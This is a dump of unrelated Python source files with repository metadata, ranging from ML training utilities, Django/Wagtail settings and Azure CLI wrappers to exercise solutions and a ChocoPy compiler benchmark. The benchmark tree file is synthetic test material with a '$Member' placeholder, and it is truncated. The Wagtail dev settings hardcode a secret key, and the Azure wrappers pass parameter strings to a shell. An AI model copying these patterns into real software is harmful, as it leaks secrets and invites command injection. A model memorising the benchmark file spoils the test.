import random import torch from seq2seq.plot import plot_attn # from seq2seq.utils import tensor_from_sentence, get_device def evaluate(src_lang, tgt_lang, enc, dec, tgt_sos_index, src_seq, seq_len): with torch.no_grad(): # shape: S X B X 1 src_tensor = tensor_from_sentence(src_lang, src_seq).view(-1, 1, 1) enc_hid = enc.init_hidden(batch_size=1) enc_outs, enc_hid = enc(src_tensor, enc_hid) if enc.bidirectional: # as the enc_outs has a 2x factor for hidden size, so reshape hidden to # match that enc_hid = torch.cat([ enc_hid[:enc.num_layers, :, :], enc_hid[enc.num_layers:, :, :] ], dim=2) device = get_device() dec_in = torch.tensor([[tgt_sos_index]], device=device).view(-1, 1) dec_hid = enc_hid dec_outs = [] dec_attns = torch.zeros(seq_len, seq_len) for di in range(seq_len): dec_out, dec_hid, dec_attn = dec(dec_in, dec_hid, enc_outs) dec_attns[di] = dec_attn.view(-1) topv, topi = dec_out.data.topk(1) dec_outs.append(tgt_lang.index2word[topi.item()]) dec_in = topi.detach() return dec_outs, dec_attns[:di + 1] def evaluate_randomly(src_lang, tgt_lang, enc, dec, tgt_sos_index, num, iter_idx): for i in range(num): src_seq, tgt_seq, seq_len = random.choice(pairs) print('>', src_seq) print('=', tgt_seq) prd_tokens, attns = evaluate( src_lang, tgt_lang, enc, dec, tgt_sos_index, src_seq, seq_len) prd_seq = ''.join(prd_tokens) print('<', prd_seq) acc = U.calc_accuracy(tgt_seq, prd_seq) print('acc: {0}'.format(acc)) plot_attn(attns, src_seq, prd_seq, acc, iter_idx)
07260035fae3775eccc23a0180c11509e81f5968
6b9084d234c87d7597f97ec95808e13f599bf9a1
/algorithms/tracker/transt/builder.py
f300dc026d1df2f2ed64f5f4be27d71f5490de44
[]
no_license
LitingLin/ubiquitous-happiness
4b46234ce0cb29c4d27b00ec5a60d3eeb52c26fc
aae2d764e136ca4a36c054212b361dd7e8b22cba
refs/heads/main
2023-07-13T19:51:32.227633
2021-08-03T16:02:03
2021-08-03T16:02:03
316,664,903
1
0
null
null
null
null
UTF-8
Python
false
false
1,328
py
import torch from models.TransT.builder import build_transt from algorithms.tracker.transt.tracker import TransTTracker from data.tracking.methods.TransT.evaluation.builder import build_evaluation_data_processors def build_transt_tracker(network_config, evaluation_config, weight_path, device): device = torch.device(device) model = build_transt(network_config, False) state_dict = torch.load(weight_path, map_location='cpu')['model'] if network_config['version'] <= 2: for key in list(state_dict.keys()): key: str = key if key.startswith('head.class_embed'): state_dict[key.replace('head.class_embed', 'head.classification')] = state_dict.pop(key) elif key.startswith('head.bbox_embed'): state_dict[key.replace('head.bbox_embed', 'head.regression')] = state_dict.pop(key) if network_config['backbone']['type'] == 'swin_transformer': from models.backbone.swint.swin_transformer import _update_state_dict_ _update_state_dict_(state_dict, 'backbone.backbone.') model.load_state_dict(state_dict) data_processor, network_post_processor = build_evaluation_data_processors(network_config, evaluation_config, device) return TransTTracker(model, device, data_processor, network_post_processor)
1dbec0cd8d756ebeae9a779507e72fa0e3c38631
3d06eeebdd598efba25d29d7e3d03d90ede1bfbd
/18_lesson(django)/video-shop/videostore/courses/forms.py
25df6a10b202d97a7c1598c18ec17325dee5ec84
[]
no_license
duk1edev/itproger
58bdd16088dec7864585d318935b118ce584874d
786f94fff6d816f3f978bd8c24c3d985ffd5ffb2
refs/heads/master
2021-01-02T02:43:32.684100
2020-03-28T18:10:25
2020-03-28T18:10:25
239,443,309
0
1
null
null
null
null
UTF-8
Python
false
false
571
py
from django import forms from .models import Course class CreateCourseForm(forms.ModelForm): def __init__(self, *args, **kwargs): super(CreateCourseForm, self).__init__(*args, **kwargs) self.fields['slug'].label = 'Название URL' self.fields['title'].label = 'Название курса' self.fields['description'].label = 'Описание курса' self.fields['img'].label = 'Изображение профиля' class Meta: model = Course fields = ['slug', 'title', 'description', 'img']
70d103be4cf7033045a7bfe4abce7325e7410269
e0980f704a573894350e285f66f4cf390837238e
/.history/rocketman/settings/dev_20210104181322.py
6b33f05fcfb179db48a0b11ba3e3a32f5bde8bef
[]
no_license
rucpata/WagtailWebsite
28008474ec779d12ef43bceb61827168274a8b61
5aa44f51592f49c9a708fc5515ad877c6a29dfd9
refs/heads/main
2023-02-09T15:30:02.133415
2021-01-05T14:55:45
2021-01-05T14:55:45
303,961,094
0
0
null
null
null
null
UTF-8
Python
false
false
638
py
from .base import * # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '0qjdxh8nibnbihjuj9*-%$#kx!i8y^wk6wt(h)@27m1g-9g$)v' # SECURITY WARNING: define the correct hosts in production! ALLOWED_HOSTS = ['localhost', 'rocketman.naukawagtail.com'] EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' INSTALLED_APPS += [ 'debug_toolbar', ] MIDDLEWARE += [ 'debug_toolbar.middleware.DebugToolbarMiddleware', ] INTERNAL_IPS = [ '127.0.0.1', ] try: from .local import * except ImportError: pass
0cb8fe31319034d1b0d7e1d5d9511de51d466943
781e2692049e87a4256320c76e82a19be257a05d
/all_data/exercism_data/python/anagram/1d85ad5d39ab4551a2af68f5a6bd2b21.py
1bbc9ad83b17ae2c9371525d8394a6a6641fbf73
[]
no_license
itsolutionscorp/AutoStyle-Clustering
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
refs/heads/master
2020-12-11T07:27:19.291038
2016-03-16T03:18:00
2016-03-16T03:18:42
59,454,921
4
0
null
2016-05-23T05:40:56
2016-05-23T05:40:56
null
UTF-8
Python
false
false
529
py
def detect_anagrams(word, anagrams): real_anagrams = [] for candidate in anagrams: # Case insensitive lower_word = word.lower() lower_candidate = candidate.lower() for char in lower_word: if char in lower_candidate: lower_candidate = lower_candidate.replace(char, "", 1) if not lower_candidate and len(candidate) == len(word): if candidate.lower() != lower_word: real_anagrams.append(candidate) return real_anagrams
f22577938fc54158f83a3dc1f43cd18d5cfa7cea
4a7ede06edbe66f9d1eb485261f94cc3251a914b
/test/pyaz/webapp/config/ssl/__init__.py
b8b893c526afb4dff9fd44ab4dc16187a35ffb19
[ "MIT" ]
permissive
bigdatamoore/py-az-cli
a9e924ec58f3a3067b655f242ca1b675b77fa1d5
54383a4ee7cc77556f6183e74e992eec95b28e01
refs/heads/main
2023-08-14T08:21:51.004926
2021-09-19T12:17:31
2021-09-19T12:17:31
360,809,341
0
0
null
null
null
null
UTF-8
Python
false
false
4,010
py
import json, subprocess from .... pyaz_utils import get_cli_name, get_params def upload(resource_group, name, certificate_password, certificate_file, slot=None): params = get_params(locals()) command = "az webapp config ssl upload " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def list(resource_group): params = get_params(locals()) command = "az webapp config ssl list " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def show(resource_group, certificate_name): params = get_params(locals()) command = "az webapp config ssl show " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def bind(resource_group, name, certificate_thumbprint, ssl_type, slot=None): params = get_params(locals()) command = "az webapp config ssl bind " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def unbind(resource_group, name, certificate_thumbprint, slot=None): params = get_params(locals()) command = "az webapp config ssl unbind " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, 
stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def delete(resource_group, certificate_thumbprint): params = get_params(locals()) command = "az webapp config ssl delete " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def import_(resource_group, name, key_vault, key_vault_certificate_name): params = get_params(locals()) command = "az webapp config ssl import " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr) def create(resource_group, name, hostname, slot=None): params = get_params(locals()) command = "az webapp config ssl create " + params print(command) output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout = output.stdout.decode("utf-8") stderr = output.stderr.decode("utf-8") if stdout: return json.loads(stdout) print(stdout) else: raise Exception(stderr) print(stderr)
[ "“[email protected]”" ]
cb4b97b896fc5683599a57fe012bcc1fe716bb96
b49e7e1fb8557f21280b452b2d5e29668613fe83
/leonardo/module/web/widget/feedreader/models.py
e2b9999d1a451c50e6f88b523b571787e8d75ef2
[ "BSD-2-Clause" ]
permissive
pombredanne/django-leonardo
6e03f7f53391c024cfbfd9d4c91bd696adcb361d
dcbe6c4a0c296a03c3a98b3d5ae74f13037ff81b
refs/heads/master
2021-01-17T10:24:09.879844
2016-04-06T19:30:05
2016-04-06T19:30:05
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,619
py
# -#- coding: utf-8 -#- import datetime import feedparser from django.db import models from django.template.context import RequestContext from django.template.loader import render_to_string from django.utils.translation import ugettext_lazy as _ from leonardo.module.web.models import Widget, ContentProxyWidgetMixin from leonardo.module.web.widgets.mixins import ListWidgetMixin TARGET_CHOICES = ( ('modal', _('Modal window')), ('blank', _('Blank window')), ) class FeedReaderWidget(Widget, ContentProxyWidgetMixin, ListWidgetMixin): max_items = models.IntegerField(_('max. items'), default=5) class Meta: abstract = True verbose_name = _("feed reader") verbose_name_plural = _('feed readers') def render_content(self, options): if self.is_obsolete: self.update_cache_data() context = RequestContext(options.get('request'), { 'widget': self, }) return render_to_string(self.get_template_name(), context) def update_cache_data(self, save=True): feed = feedparser.parse(self.link) entries = feed['entries'][:self.max_items] context = { 'widget': self, 'link': feed['feed']['link'], 'entries': entries, } self.cache_data = render_to_string( 'widget/feedreader/_content.html', context) self.cache_update = datetime.datetime.now() if save: self.save() def save(self, *args, **kwargs): self.update_cache_data(False) super(FeedReaderWidget, self).save(*args, **kwargs)
8107640d66d0dd58eb2d0351d0559824dc3a2c98
c29763f930c7c00b435a9b25dddf7f6e2e8548a1
/Atividades disciplinas/6 periodo/IA/algoritmo de dijkstra/test.py
6417af691864735fbf0325a743f03bdf7e10a868
[]
no_license
jadsonlucio/Faculdade
f94ae6e513bb783f01c72dcb52479ad4bb50dc03
2ca553e8fa027820782edc56fc4eafac7eae5773
refs/heads/master
2020-07-06T20:34:10.087739
2019-12-07T20:45:55
2019-12-07T20:45:55
203,131,862
0
0
null
null
null
null
UTF-8
Python
false
false
1,172
py
import numpy as np from map.location import Location, calc_distance from map.map import Map COORDINATES_MAP_TEST_1 = { "latitude_min" : 0, "latitude_max" : 10, "longitude_min" : 0, "longitude_max" : 10 } CIDADES_ALAGOAS = list(open("tests/cidades_alagoas.txt", "r").readlines())[:10] def generate_random_sample(locations_names, latitude_min, latitude_max, longitude_min, longitude_max): locations = [] for location_name in locations_names: latitude = np.random.uniform(latitude_min + 1, latitude_max - 1) longitude = np.random.uniform(longitude_min + 1, longitude_max - 1) locations.append(Location(location_name, latitude,longitude)) for i in range(len(locations)): for j in range(i + 1, len(locations), 1): if np.random.random() > 0.7: cost = calc_distance(*locations[i].real_pos, *locations[j].real_pos) locations[i].add_conection(locations[j], cost) return locations def get_map_test_1(): locations = generate_random_sample(CIDADES_ALAGOAS, **COORDINATES_MAP_TEST_1) return Map(locations, **COORDINATES_MAP_TEST_1)
251411a9333fbd7da3a0557d59516ffd7672af6c
f6d8f211bd87b47b511ac0b6599806ab3131999f
/04-case-study-interface-design/ex_4_12_5.py
937b06979b4f78846f3bdcb3f460fea8fed15b30
[]
no_license
csu-xiao-an/think-python
6cea58da4644cd1351112560e75de150d3731ce9
8177b0506707c903c3d4d9a125c931aba890cc0c
refs/heads/master
2020-07-26T19:35:38.919702
2019-09-16T03:33:15
2019-09-16T03:33:15
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,746
py
"""This module contains a code for ex.5 related to ch.4.12. Think Python, 2nd Edition by Allen Downey http://thinkpython2.com """ import math import turtle def polyline(t, n, length, angle): """Draws n line segments. :param t: Turtle object :param n: number of line segments :param length: length of each segments :param angle: degrees between segments """ for i in range(n): t.fd(length) t.lt(angle) def arc(t, r, angle): """Draws an arc with the given radius and angle :param t: Turtle object :param r: radius of the arc :param angle: angle subtended by the arc, in degrees """ arc_length = 2 * math.pi * r * abs(angle) / 360 n = int(arc_length / 4) + 3 step_length = arc_length / n step_angle = float(angle) / n polyline(t, n, step_length, step_angle) def arch_spiral(t, n, length=4): """Draws an Archimedian spiral. :param t: Turtle object :param n: number of line segments :param length: length of each segment https://en.wikipedia.org/wiki/Archimedean_spiral """ a = 0.01 # how loose the initial spiral starts out (larger is looser) b = 0.0002 # how loosly coiled the spiral is (larger is looser) theta = 0.0 for i in range(n): t.fd(length) dtheta = 1 / (a + b * theta) t.lt(dtheta) theta += dtheta def fib_spiral(t, n): """Draws a Fibonacсi spiral. :param t: Turtle object :param n: length of sequence """ a, b = 0, 1 for i in range(n): arc(t, a, 90) a, b = b, a+b if __name__ == '__main__': bob = turtle.Turtle() # arch_spiral(bob, 200) fib_spiral(bob, 15) bob.hideturtle() turtle.mainloop()
49dbafb4ad1aeaf9119acdede9c7aa71c786d66a
727f1bc2205c88577b419cf0036c029b8c6f7766
/out-bin/py/google/fhir/models/model_test.runfiles/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/layers/utils.py
19fe50abb25751952deed4e3e7c7ae32c95d8ff6
[ "Apache-2.0" ]
permissive
rasalt/fhir
55cf78feed3596a3101b86f9e9bbf6652c6ed4ad
d49883cc4d4986e11ca66058d5a327691e6e048a
refs/heads/master
2020-04-13T00:16:54.050913
2019-01-15T14:22:15
2019-01-15T14:22:15
160,260,223
0
0
Apache-2.0
2018-12-03T22:07:01
2018-12-03T22:07:01
null
UTF-8
Python
false
false
174
py
/home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/layers/utils.py
74b5b828f3763b47c0928d9ef000736bbb8defdc
5c71d64db74c4c39b6e9adb70036a56e197f111c
/amsterdam-airbnb/CV_LinearRegression_selectedfeatures.py
7bf77d7e9d82ecfe3d6a251211a286ad6095989d
[]
no_license
sebkeil/Group20-VU
3e70f1e464bb9873c8e8125ae190a52f08c85804
38f80d80944583e1ac48c6219130de69c0c60242
refs/heads/master
2021-05-18T03:15:15.671035
2020-09-06T15:00:10
2020-09-06T15:00:10
251,079,102
0
0
null
null
null
null
UTF-8
Python
false
false
1,035
py
from sklearn.model_selection import cross_validate from sklearn.linear_model import LinearRegression import pandas as pd import numpy as np from sklearn.preprocessing import StandardScaler # read in files X_train = pd.read_csv('train.csv') y_train = pd.read_csv('y_train.csv', names=['price']) # drop features X_train = X_train.drop(['bathrooms', 'bedrooms','guests_included','host_listings_count','instant_bookable_f','room_type_Private room'],axis=1) # standardize data scaler = StandardScaler() X_train = scaler.fit_transform(X_train) # Create a linear regression object: reg reg = LinearRegression() # Compute 5-fold cross-validation scores: cv_scores cv_scores = cross_validate(reg, X_train, y_train, cv=5, scoring=('r2', 'neg_root_mean_squared_error')) # Print the 5-fold cross-validation scores #print(cv_scores) print("Average 5-Fold CV Score (R2): {}".format(round(np.mean(cv_scores['test_r2']),4))) print("Average 5-Fold CV Score (RMSE): {}".format(round(np.mean(cv_scores['test_neg_root_mean_squared_error']),2)))
8dca1271759ee7e83227a510a85cae83c7c18567
1c390cd4fd3605046914767485b49a929198b470
/PE/73.py
605024f5c153e5bca66a554ce755b76a2d0b1973
[]
no_license
wwwwodddd/Zukunft
f87fe736b53506f69ab18db674311dd60de04a43
03ffffee9a76e99f6e00bba6dbae91abc6994a34
refs/heads/master
2023-01-24T06:14:35.691292
2023-01-21T15:42:32
2023-01-21T15:42:32
163,685,977
7
8
null
null
null
null
UTF-8
Python
false
false
148
py
from fractions import gcd z=0 for i in range(12001): print i for j in range(i): if gcd(i,j)==1 and 2*j<=i and 3*j>=i: z+=1 print z-2
844fd7640e35207a398b570c7d71e27fb7b2de5f
70734c75951d1349a4a4f66ba82a24f4726aa968
/smartrecruiters_python_client/models/source_types.py
6e69f1629ccd49872df29317f8a45592265c7bfa
[ "MIT" ]
permissive
yogasukmawijaya/smartrecruiters-python-client
0f044847ef76bbe57a3a922e7b0adb4f98c0917f
6d0849d173a3d6718b5f0769098f4c76857f637d
refs/heads/master
2020-04-09T16:45:41.703240
2017-07-08T19:59:25
2017-07-08T19:59:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,002
py
# coding: utf-8 """ Unofficial python library for the SmartRecruiters API The SmartRecruiters API provides a platform to integrate services or applications, build apps and create fully customizable career sites. It exposes SmartRecruiters functionality and allows to connect and build software enhancing it. OpenAPI spec version: 1 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class SourceTypes(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ def __init__(self, total_found=None, content=None): """ SourceTypes - a model defined in Swagger :param dict swaggerTypes: The key is attribute name and the value is attribute type. :param dict attributeMap: The key is attribute name and the value is json key in definition. """ self.swagger_types = { 'total_found': 'int', 'content': 'list[SourceTypesContent]' } self.attribute_map = { 'total_found': 'totalFound', 'content': 'content' } self._total_found = total_found self._content = content @property def total_found(self): """ Gets the total_found of this SourceTypes. :return: The total_found of this SourceTypes. :rtype: int """ return self._total_found @total_found.setter def total_found(self, total_found): """ Sets the total_found of this SourceTypes. :param total_found: The total_found of this SourceTypes. :type: int """ if total_found is None: raise ValueError("Invalid value for `total_found`, must not be `None`") self._total_found = total_found @property def content(self): """ Gets the content of this SourceTypes. :return: The content of this SourceTypes. :rtype: list[SourceTypesContent] """ return self._content @content.setter def content(self, content): """ Sets the content of this SourceTypes. :param content: The content of this SourceTypes. 
:type: list[SourceTypesContent] """ if content is None: raise ValueError("Invalid value for `content`, must not be `None`") self._content = content def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, SourceTypes): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
9b0e6e18151779ef2c05e047ba28042259e4bdb8
4ab83ae9b3320e423116579a2de14600aeda16e0
/46_孩子们的游戏(圆圈中最后剩下的数).py
15ab243f7034126827dcc0951c5356c320a720dc
[]
no_license
yaodalu/JZOffer
a4e8d6611cbff686dbbdd95226caeb5614945f9c
ede5f500f45b865058352b0c37629d7f2254a4d6
refs/heads/master
2020-05-21T17:10:09.705926
2019-09-10T01:05:55
2019-09-10T01:05:55
186,118,657
1
1
null
null
null
null
UTF-8
Python
false
false
2,083
py
# -*- coding:utf-8 -*- class Solution: def LastRemaining_Solution(self, n, m): """单向循环链表解法""" if n == 0: #特殊情况,没有小朋友 return -1 if n == 1: #特殊情况,只有一个小朋友 return 1 if m == 1: #特殊情况,每次第一个小朋友退出 return n-1 myList = MyList(n) while not myList.judgeOneElem(): myList.pop(m) return myList.judgeOneElem().val class Node(): def __init__(self,val): self.val = val self.next = None class MyList(): """尾指针指向头节点的单向循环链表""" def __init__(self,n): #n>=2 self.__head = Node(0) cur = self.__head for i in range(1,n-1): #退出循环时,cur指向倒数第二个节点 cur.next = Node(i) cur = cur.next cur.next = Node(n-1) cur = cur.next cur.next = self.__head def judgeOneElem(self): """判断链表是否只有一个节点""" if self.__head and self.__head.next == self.__head: return self.__head #如果链表只有一个节点,则返回该节点 return False def pop(self,m): """遍历""" if self.__head is None: return cur,count = self.__head,0 while count != m-2 : #退出循环的时候,指针指向需要删除的节点的前一个节点 cur = cur.next count += 1 self.__head = cur.next.next #头节点指向删除节点的后一个节点 cur.next = self.__head if __name__ == "__main__": print Solution().LastRemaining_Solution(5,3)
0023937f5c12f7a15fd54083090d66e26fe0887a
f2cacb05d20e2e699e64035b6bee9a8bed3d3b8e
/atm/__init__.py
4d85ea4f53cca492fe01cc6e8f66cf043c77030a
[ "BSD-3-Clause" ]
permissive
moeyensj/atm
31e54e93c0881307770ab0d7815b9c4678f9f2e6
0523600cf44423a1ef72ca40fff29bbfbe1281a8
refs/heads/master
2022-08-13T05:33:54.131701
2021-03-03T23:38:02
2021-03-03T23:38:02
196,091,171
9
2
BSD-3-Clause
2021-03-03T23:38:03
2019-07-09T22:16:20
Python
UTF-8
Python
false
false
289
py
from .version import __version__ from .config import * from .constants import * from .frames import * from .helpers import * from .functions import * from .models import * from .obs import * from .analysis import * from .data_processing import * from .fit import * from .plotting import *
15a860f8bc4c092e866e5ee2784958d676c664fb
a98bc8906c3fbe4d388442d24cbeed06d06686f9
/Codechef 2019/sept Long 2019/chefinsq.py
a3cdcb3f34a5e9ed032f62cfec6c69d944f9028e
[]
no_license
Arrowheadahp/Contests-Challenges-and-Events
1ac4f1b2067276fa669e86ecfdb685d95ba663fd
fc156e5ae49b3074a9dbd56acd4fdc2af25c6a3f
refs/heads/master
2022-12-13T19:50:38.041410
2020-08-22T14:16:23
2020-08-22T14:16:23
197,886,111
0
0
null
null
null
null
UTF-8
Python
false
false
342
py
def fact(k): f = 1 while k: f*=k k-=1 return f for _ in range(input()): n, k = map(int, raw_input().split()) A = map(int, raw_input().split()) A.sort() x = A[k-1] s = A[:k].count(x) t = A.count(x) #print s, t print fact(t)/(fact(s)*fact(t-s)) ''' 2 4 2 1 2 3 4 4 2 1 2 2 2 '''
70a701bc5cf1cd1ac9d4ac6d0363562e3c83398d
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
/cases/synthetic/tree-big-2951.py
fa63609bcdcdfb979fea5d777ccafaefcce4369d
[]
no_license
Virtlink/ccbench-chocopy
c3f7f6af6349aff6503196f727ef89f210a1eac8
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
refs/heads/main
2023-04-07T15:07:12.464038
2022-02-03T15:42:39
2022-02-03T15:42:39
451,969,776
0
0
null
null
null
null
UTF-8
Python
false
false
23,286
py
# Binary-search trees class TreeNode(object): value:int = 0 left:"TreeNode" = None right:"TreeNode" = None def insert(self:"TreeNode", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode(x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode(x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class TreeNode2(object): value:int = 0 value2:int = 0 left:"TreeNode2" = None left2:"TreeNode2" = None right:"TreeNode2" = None right2:"TreeNode2" = None def insert(self:"TreeNode2", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode2(x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode2(x, x) return True else: return self.right.insert(x) return False def insert2(self:"TreeNode2", x:int, x2:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode2(x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode2(x, x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode2", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains2(self:"TreeNode2", x:int, x2:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class TreeNode3(object): value:int = 0 value2:int = 0 value3:int = 0 left:"TreeNode3" = None left2:"TreeNode3" = 
None left3:"TreeNode3" = None right:"TreeNode3" = None right2:"TreeNode3" = None right3:"TreeNode3" = None def insert(self:"TreeNode3", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode3(x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode3(x, x, x) return True else: return self.right.insert(x) return False def insert2(self:"TreeNode3", x:int, x2:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode3(x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode3(x, x, x) return True else: return self.right.insert(x) return False def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode3(x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode3(x, x, x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode3", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains2(self:"TreeNode3", x:int, x2:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class TreeNode4(object): value:int = 0 value2:int = 0 value3:int = 0 value4:int = 0 left:"TreeNode4" = None left2:"TreeNode4" = None left3:"TreeNode4" = None left4:"TreeNode4" = None right:"TreeNode4" = None 
right2:"TreeNode4" = None right3:"TreeNode4" = None right4:"TreeNode4" = None def insert(self:"TreeNode4", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode4(x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode4(x, x, x, x) return True else: return self.right.insert(x) return False def insert2(self:"TreeNode4", x:int, x2:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode4(x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode4(x, x, x, x) return True else: return self.right.insert(x) return False def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode4(x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode4(x, x, x, x) return True else: return self.right.insert(x) return False def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode4(x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode4(x, x, x, x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode4", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains2(self:"TreeNode4", x:int, x2:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool: if x < $Member: if self.left is None: return False else: return self.left.contains(x) elif 
x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class TreeNode5(object): value:int = 0 value2:int = 0 value3:int = 0 value4:int = 0 value5:int = 0 left:"TreeNode5" = None left2:"TreeNode5" = None left3:"TreeNode5" = None left4:"TreeNode5" = None left5:"TreeNode5" = None right:"TreeNode5" = None right2:"TreeNode5" = None right3:"TreeNode5" = None right4:"TreeNode5" = None right5:"TreeNode5" = None def insert(self:"TreeNode5", x:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def insert2(self:"TreeNode5", x:int, x2:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return 
